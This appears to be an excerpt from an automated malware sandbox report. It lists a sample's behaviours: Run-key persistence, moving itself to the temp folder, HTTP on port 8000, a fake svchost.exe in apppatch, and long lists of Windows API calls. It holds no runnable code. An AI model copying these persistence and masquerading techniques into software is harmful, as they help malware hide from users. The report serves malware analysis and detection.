    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

    Hooking and other Techniques for Hiding and Protection

    barindex
    Moves itself to temp directory
    Source: c:\users\user\desktop\arxtps1ste.exeFile moved: C:\Users\user\AppData\Local\Temp\A834.tmpJump to behavior
    Uses known network protocols on non-standard ports
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 8000
    Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 8000
    Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 8000
    Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 8000
    Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49730
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BBD300 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,2_2_02BBD300
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BB9ED0 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,2_2_02BB9ED0
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BBCFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,2_2_02BBCFE9
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BBCFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,2_2_02BBCFE9
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BBCDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,2_2_02BBCDC0
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BBCDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,2_2_02BBCDC0
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BBCDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,2_2_02BBCDC0
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BBCDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,2_2_02BBCDC0
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BBCD50 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,2_2_02BBCD50
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008DD300 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,5_2_008DD300
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008DCDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,5_2_008DCDC0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008DCDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,5_2_008DCDC0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008DCDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,5_2_008DCDC0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008DCDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,5_2_008DCDC0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008DCD50 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,5_2_008DCD50
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008D9ED0 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,5_2_008D9ED0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008DCFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,5_2_008DCFE9
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008DCFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,5_2_008DCFE9
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_0088D300 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,6_2_0088D300
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_0088CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_0088CDC0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_0088CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_0088CDC0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_0088CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_0088CDC0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_0088CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_0088CDC0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_0088CD50 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,6_2_0088CD50
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_00889ED0 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,6_2_00889ED0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_0088CFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_0088CFE9
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_0088CFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_0088CFE9
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BDD300 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,9_2_02BDD300
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BD9ED0 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,9_2_02BD9ED0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BDCFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,9_2_02BDCFE9
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BDCFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,9_2_02BDCFE9
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BDCDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,9_2_02BDCDC0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BDCDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,9_2_02BDCDC0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BDCDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,9_2_02BDCDC0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BDCDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,9_2_02BDCDC0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BDCD50 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,9_2_02BDCD50
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BC5720 GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,RtlAddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,2_2_02BC5720
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
